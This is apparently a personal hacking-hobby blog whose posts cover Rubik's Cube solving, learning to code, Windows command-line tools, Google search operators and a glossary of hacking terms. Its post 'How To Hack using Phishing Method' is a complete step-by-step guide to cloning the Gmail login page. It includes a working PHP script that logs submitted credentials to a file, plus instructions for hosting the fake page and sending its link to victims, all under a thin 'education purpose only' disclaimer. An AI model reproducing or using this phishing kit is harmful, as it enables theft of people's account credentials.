Saturday, 9 February 2013

Hacking Rubik's Cube

Discovering The Rubik's Cube

Rubik's Cube is a 3-D combination puzzle invented in 1974 by Hungarian sculptor and professor of architecture ErnÅ‘ Rubik.

Rubik's Cube is foremost the most entertaining and amazing toy I've ever played. Let's face it, at some point of your life you must have tried to solve it. And the bitter truth is that, which appeared to be fun at first became annoying and frustrating in no time. Only small proportion of those succeeded while most of people gave up solving it. And the secret is that I was also one of those failed people but still i managed to somehow    
solve at least one side, but it wasn't enough to impress everyone. Until recently, my 5 year old cube got my attention and magically i decided to took up the challenge to solve it. 

So i started my journey by hacking and discovering everything about the cube. In my opinion the best way to solve the Rubik's cube is to start up by studying it completely. Know the structure and working of the Cube, Wikipedia is a good place to start off with.

After searching for countless websites,i got to know that there are primarily two methods by which you can solve the Rubik's Cube.
1. By memorising the moves/Algorithm.
2. By creating your own moves to solve i.e. without memorization or the Old School one. 

First one sounds quite geeky, most of pro players use Algorithm to solve the cube since using Algorithm saves time. Well, there are plenty of Algorithm by which you can solve the Rubik's cube. But the sad part about is that you will need to memorize every algorithm and these algorithm can sometime be really long. In addition they take all the fun out of it.  

By creating your own moves while solving the cube is really interesting and fun. But you will still need help in that as well.

Well if you want to solve the cube without memorising you will need a hell lot of patience and time. To spped up i'll suggest you to look at the YouTube Videos of Stedwick on YouTube. He had shown the basic steps involved in solving the cube in the four videos session with each and every detail. Here is the link of his videos. 

  1. How to Solve A Rubik's Cube(No Memorization)- part 1
  2. How to Solve A Rubik's Cube(No Memorization)- part 2
  3. How to Solve A Rubik's Cube(No Memorization)- part 3
  4. How to Solve A Rubik's Cube(No Memorization)- part 4
Warning: Although it may sound fun but i must tell you that it is not easy, frankly speaking quite tough. If you like challenges you might want to pick up this challenge. 
Remember "Patience is the key to success!!"

So, after watching above videos i started my quest to solve the cubic. It was really fun and i almost completed the cube until i stuck at one point after which it became boring and annoying like the old days.  

So, after failing in my first attempt, i made changes my plans and decided to take the easy and monotonous way of solving the cube. Yup, the fancy Algorithms were my last hope. 

Once again i started my Searching Websites and YouTube for solving the cube by memorising moves. 
I found the videos of Dan Brown, his videos are also the most watched videos. So i watched them and found very quickly found out that it was the quite easy method of solving the cube but the only catch was long Algorithms. 

I started solving the cube, believe me even with the pre-planned moves/Algorithms it wasn't easy for me to solve the cube in a single run. I had to try a dozen of times before i finally succeeded in solving the Cube. It was the one of the most amazing and memorable moment of my life since i finally found something about which i can Bragg about.

Although it is quite hard to memorize every algorithms i still somehow managed to remember them without even mugging them up. Just understand the algorithm, if you properly understand the algorithms than they i'll came naturally and after few tries every moves coming naturally as if i knew them already.   
Happy Cubing!!

Extra Note:Well if you want to speed up your solving time you will need a good quality cube. Dayan Cube is the best Cube but is quite costly compared to Rubik's. Dayan Cube is mainly used by Pros.

Fun Stuff: I was so fascinated that i even found out movies related to cube. Although not related to Rubik's Cube, Cube Trilogy movie is fascinating horror(Sort of) Science fiction movie. It is a must watch movie in my opinion.

Good Luck to everyone who now wants to solve the Rubik's Cube. 

Other Links that may come in handy: 

If you need any help just let me know in the comments, i'll be happy to solve your problems. 

Monday, 21 January 2013

Open Online Education

Open Online Education

In my previous post i told you some of the websites where you can learn coding for free/paid. So i thought why should restrict ourselves to coding when there is a huge number of topics one can study depending on his/her interest.

So in this post i'm going to tell you about some websites where you can learn almost anything you ever wished for and that's too online. Nowadays whole world is going online, i wonder if it will change our education system in near future. 

So here is the list of websites:

Coutsey: Quora

Keep spreading the free education. Share with your friends.

If I've missed any or you want to share any website feel free to comment, i'll add it to the list. 
Keep a tab on the list as it will be updated on regular basis. 





Friday, 18 January 2013

Learn to Code for Free.


Are you a Coder or wish to be a coder or you just want to learn coding to enhance your hacking skills.

Well if you are serious about hacking than the first rule and foremost the most important rule to become a good ethical hacker is to have a good coding/programming skills, i bet you don't wanna be mocked as a script kiddie or a noob-hacker. It is important for a hacker to know details about all languages as they are going to be your basics while breaking a code.
So if you wish to be a LEET/1337 you must know at-least one programming. If you know C/C++ than it won't be too hard for you to learn new languages. A basic knowledge of programming is a must.
Even if you don't know anything about coding, don't worry i'll tell you a lots of websites where you can learn and master the skills of coding. 

You must be wondering that which language should i learn first, what is the order of learning languages. Well it differ for different people like for beginner and also depends on one's own interest as well, every person will tell you different priority list i'm going to tell you mine. Fell free to choose your on path.

List of languages to be learned:

  • C\C++ : Good for learning basics of programming and easy to learn as well.
  • Python: Quick way to write exploits. If you are talking about hacking applications and websites. 
  • Perl
  • Ruby  :For Metasploit hacking
  • Assembly Languages
  • Java
  • Visual Basic
  • HTML,CSS & JQuerry : To know the structure of a website, comes handy in website hacking and   finding vulnerability.

Hoof!! That's a lot of languages and you might be thinking where will i get to learn all these. There are lots of free websites where you can learn coding for free/paid. 
Following are the list of website where you can learn coding:


Now now get off your hands and start coding. 
Good Luck Everyone.


Saturday, 8 September 2012

Command Prompt Tips

We all use command prompt for many tasks.

So what is CMD?
Command Prompt (executable name cmd.exe) is the Microsoft-supplied command-line interpreter on OS/2, Windows CE and on Windows NT-based operating systems.

Professinal Hackers extensively use CMD to hack and gain acesses to windows, so one one must have a good knowledge about CMD in order to become a pro-hacker.

Here is a list of some CMD commands:

1. ipconfig
This is the top most command for seeing the ip address,subnet mask and default gateway also includes display and flush DNS cache, re-register the system name in DNS.. This will most useful tool for viewing and troubleshooting TCP/IP problem.

2. systeminfo
Have a need to display operating system configuration information for a local or remote machine, including service pack levels? Then systeminfo is the tool to use. This command gives all the info including: host name, OS type, version, product ID, install date, boot time and hardware info (processor and memory).

5. netstat
Then netstat is the tool you want to run. The output provides valuable information of all connections and listening ports, including the executable used in the connections. In additon to the above info, you can view Ethernet statistics, and resolve connecting host IP Addresses to a fully qualified domain name.

6. nslookup
nslookup can be a valuable tool for testing and troubleshooting DNS servers.
For Eg., [nslookup google.com]  diplays the adresses and other info. 

8. ping
These tools can be helpful with connectivity to other systems. Ping will test whether a particular host is reachable across an IP network.

For Eg. [ping google.com] Displays the IP adresses of Google.com.

9. eventvwr.msc
this will open up event displayer which can be used to view the activity done on the computer. 



Thursday, 6 September 2012

Google Dorks

Google Dorks


Google!!!
One of the most used search engine of all time. Problems to our all solution is to "Google up everything" or what is now popularly called as "Googling" . We use google for almost everything, it has now become an integral part of our life. 
But do you know how to use it efficiently,sometime you want to search for something and messed up with clicking on everylink that appears on the search result. And even after searching for hours you don't get satifactory result.
That was what you used to do before, from now you will probably be using google dorks for fast and efficient search.
For eg.  okay lets suppose that you wanna search for ebooks on topic 'networking' , our obvious search queries would be like this "Networking ebooks", "free ebooks for networking" etc,we keep going into the websites, clicking on link after links and then get proper downling links. Now lets do the same search in a different way , type on google "ext:pdf networking" (without quotes). So how about that, impressed yet.!!

If you are new in Hacking, maybe it will be a new term for you. But it is very famous in hackers world now a days.Actually its all are google search opreators, means hackers are taking benefit of google search techniques.

Some of basic operators:
     1.site: It returns the websites of specified domains.
         For Eg. [site:Google.com] will return the links of webpages of domain google.com.

     2. info: It will present information that Google has about that web page.
         For Eg., [info:www.google.com] will show information about the Google homepage. 

     3.inurl-It restricts the results to sites whose URL's contains specified phrase.
         For Eg: [inurl:coe-roorkee.com: contact us]  give you the contact details of the website.

     4.cache: It returns the cached webpage retain by google. 
         For Eg. [cache:facebook.com] will display a cache page of facebook.

     5.ext- It specifies the extension of file type. 
       For Eg. [ext:pdf] will disaply all pdf files related to hacking and ext:ppt will give ppts for hacking. 
     6. related- It returns the websites similar to specified websites.
        For Eg.[related:google.com] will list all the search engines in the search result.

    7. define:It will provide a definition of the words you enter after it, gathered from various online sources.
        For Eg: [define:Hacking} will define the meaning of hacking.

    8.link:It will list webpages that have links to the specified webpage
       For Eg.  [link:www.google.com] will list webpages that have links pointing to the Google homepage. 


Google Dorks can be used to find the vulnerability in the sites. Hackers use google dorks to find SQL vulnerability in sites. 
I'll disscuss how to use google dorks for SQL injection in later posts. 

Monday, 3 September 2012

How To Hack using Phishing Method



What is Phishing?


Phishing is the process of stealing sensitive information, such as usernames, passwords, and bank information, by pretending to be someone you’re not. An example of this would be if you receive and e-mail from a hacker pretending to be your bank. In this e-mail, it might tell you that you need to update your account before it expires, and then the hacker provides a link. Once you click on the link, you arrive at a website that looks exactly like your actual bank page. In reality it’s just a perfect replica, and when you input your login details, it sends it to the hackers email or stores it on his web server. Hackers that create the best, most deceiving phishing web pages are knowledgeable in the area of HTML and the PHP programming. Below I will show a simple example of some of the steps a hacker might take to create a phishing website. By seeing the steps a hacker would take, will help you defend against such an attack.

Note: This is for education purpose only.

Follow the following steps:

1. First the hacker chooses a target. The most popular targets for phishing attacks are e-mail services such as Hotmail, facebook and Gmail because they are the most common and once a hacker gets access to your e-mail, he also gets access to a load of other user information for all the other websites you use. In this example we will pretend the hacker chose Gmail as his target.

2. After choosing his target, the hacker will go to the website and save the whole main page. I use Mozilla Firefox ,(highly recommend using this browser for its security and customization.) So I would go to www.gmail.com and click File -> Save page as… , or simply hit <CTR> + S which does this automatically. Choose where you would like to save the web page and hit Save.



3. Next the hacker would create a PHP script to do his dirty deed of steeling your information. Below is a simple PHP script that logs and stores your login details when you click “Sign in”. To see how it works, copy and paste the following code into notepad. Next save it into the same directory as you saved the Gmail page, and name it phish.php. It should make a PHP file in the folder. If you dont find any PHP file than save the file with quotations like "phish.php" , it should make a php file.
 In addition to the phish.php page, create a new empty text file and name it list.txt.

CODE:
------------------------------------------------------------------------------------------------------------
<?php
header("Location: http://www.gmail.com.com");
$handle = fopen("list.txt", "a");
foreach($_GET as $variable => $value)
{
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
------------------------------------------------------------------------------------------------------------

So far you should see the following in your folder:

4. Now the hacker would have to edit the main Gmail page to include his PHP script. To see what the hacker would do, open up the main Gmail page named ServiceLogin.htm with notepad.

5. Hit <CTR> + F , or go to Edit -> Find , type in action and hit “Find Next”.

6. This will highlight the first occurrence of the word “action” in the script and you should see the following:
There are two “action” occurrences in the script so make sure you have the right one by looking at the “form id” name above. Change the link between action = “ “ to phish.php . This will make the form submit to your PHP phish script instead of to Google. After the link you will see the code:

Change the word “POST” to “GET” so that it looks like method=”GET”. What the GET method does is submit the information you type in through the URL so that the PHP script can log it.

7. Save the  file and.rename ServiceLogin.htm to index.htm. The reason you want to name it “index” is so when you upload it to a web host and someone goes to your link, the index page is the first page that shows up.

8.Now you'll need a free web hosting service that supports PHP. 
Go to http://www.google.com and search for free web hosting websites.
Choose any one of a website. I'll reccommend to choose either 00webhost.com or 5gbfree.com(I used this one). 

9.Sign Up for a free account. After Signing up, go to the website and than login with your account.
It will take you to the C-panel X, . there go to the file manager and choose webroot as directory.

 A new tab will open up. There up load all the file index.html, list.txt and PHP file. 
When uploading change the permission of the list.txt to 777 by ticking all the boxes. 


Now your website is read for phishing. 
Now send the your website domain name to the salve. You can find the domain name of your wesite in the C-panel. 
Whenever someone will login with you fake page its user name and password will be saved in list.txt, you can go to file manager and view it from there.

If any problem persist let me know in the comments. 

Terms One should know


                    Some Common must known Terms

What is Hacker:

A hacker is someone who likes to tinker with electronics or computer systems. Hackers like to explore and learn how computer systems work, finding ways to make them do what they do better, or do things they weren’t intended to do.

There are two types of hackers:

White Hat – These are considered the good guys. White hat hackers don’t use their skills for illegal purposes. They usually become Computer Security experts and help protect people from the Black Hats.

Black Hat – These are considered the bad guys. Black hat hackers usually use their skills maliciously for personal gain. They are the people that hack banks, steal credit cards, and deface websites.
These two terms came from the old western movies where the good guys wore white hats and the bad guys wore black hats.

Now if you’re thinking, “Oh boy! Being a black hat sounds awesome!”, Then I have a question for you. Does it sound cool to live in a cell the size of your bathroom and be someone’s butt buddy for many years? That’s what I thought.

Hacker Hierarchy

Script kiddies – These are the wannabe hackers. They are looked down upon in the hacker community because they are the people that make hackers look bad. Script kiddies usually have no hacking skills and use the tools developed by other hackers without any knowledge of what’s happening behind the scenes.

Intermediate hackers – These people usually know about computers, networks, and have enough programming knowledge to understand relatively what a script might do, but like the script kiddies they use pre-developed well-known exploits (- a piece of code that takes advantage of a bug or vulnerability in a piece of software that allows you to take control of a computer system) to carry out attacks

Elite Hackers – These are the skilled hackers. They are the ones that write the many hacker tools and exploits out there. They can break into systems and hide their tracks or make it look like someone else did it. You should strive to eventually reach this level.


IP Adresses:

 An Internet Protocol address (IP address) is a numerical label assigned to each device (e.g., computer, printer). Every Computer connected to Internet has a unique number by which is its identity over the internet. An IP address serves two principal functions: host or network interface identification and location addressing. By IP addresses we communicate on the internet.
A Typical IP Addresses looks like following 121:14:11:12.
You can find your computer's IP Addresses by clicking here HERE.


Domain Name System (DNS) Lookup:

The Process of converting a domain name into its respective IP Addresses. Whenever you type a web addresses, the browser automatically performs a DNS lookup for that website.



DNS Server:

DNS server is a server which will handle the DNS Lookup querry done by the browser. DNS server can be locally installed in any specific organisation.



Port:

In computer hardware, a port serves as an interface between the computer and other computers or peripheral devices. It is usually used in exchanging data. Ports can be external(Hardware) Eg. USB port or may in Virtual.

Virtual port are usually used by web applications to communicated with the servers.



HTTP:

Hyper Text Transfer Protocol is the protocol used by browsers to communicated with the browsers.

HTTPS is the secure form of HTTP usually used for establishing a secure connection when highly sensitive data communication occurs.



Porxy Servers:

A proxy Server is a server that acts as an intermediary for requests from clients seeking resources from other servers. Whenever client send some request for any website it is forwarded to the proxy server and than proxy server foreword this request to the server.

A proxy server has a variety of potential purposes, including:

  • To keep machines behind it anonymous, mainly for security.
  • To speed up access to resources (using caching). Web proxies are commonly used to cache web pages from a web server.
  • To prevent downloading the same content multiple times (and save bandwidth).
  • To log / audit usage, e.g. to provide company employee Internet usage reporting.
  • To scan transmitted content for malware before delivery.
  • To scan outbound content, e.g., for data loss prevention.
  • Access enhancement/restriction
  • To apply access policy to network services or content, e.g. to block undesired sites.
  • To access sites prohibited or filtered by your ISP or institution.
  • To bypass security / parental controls.
  • To circumvent Internet filtering to access content otherwise blocked by governments.


At last the most important one...

What does it take to become a hacker?

Becoming a great hacker isn’t easy and it doesn’t happen quickly. Being creative helps a lot. There is more than one way a problem can be solved, and as a hacker you encounter many problems. The more creative you are the bigger chance you have of hacking a system without being detected. Another huge
8
quality you must have is the will to learn because without it, you will get nowhere. Remember, Knowledge is power. Patience is also a must because many topics can be difficult to grasp and only over time will you master them.